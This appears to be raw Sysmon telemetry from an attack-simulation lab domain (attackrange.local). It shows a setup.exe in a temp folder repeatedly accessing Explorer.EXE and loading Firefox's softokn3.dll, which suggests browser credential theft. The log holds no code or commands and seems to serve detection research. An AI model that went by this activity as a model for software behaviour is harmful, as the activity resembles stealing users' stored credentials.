13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\softokn3.dll2021-01-18 13:59:52.552 10341000x800000000000000015409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 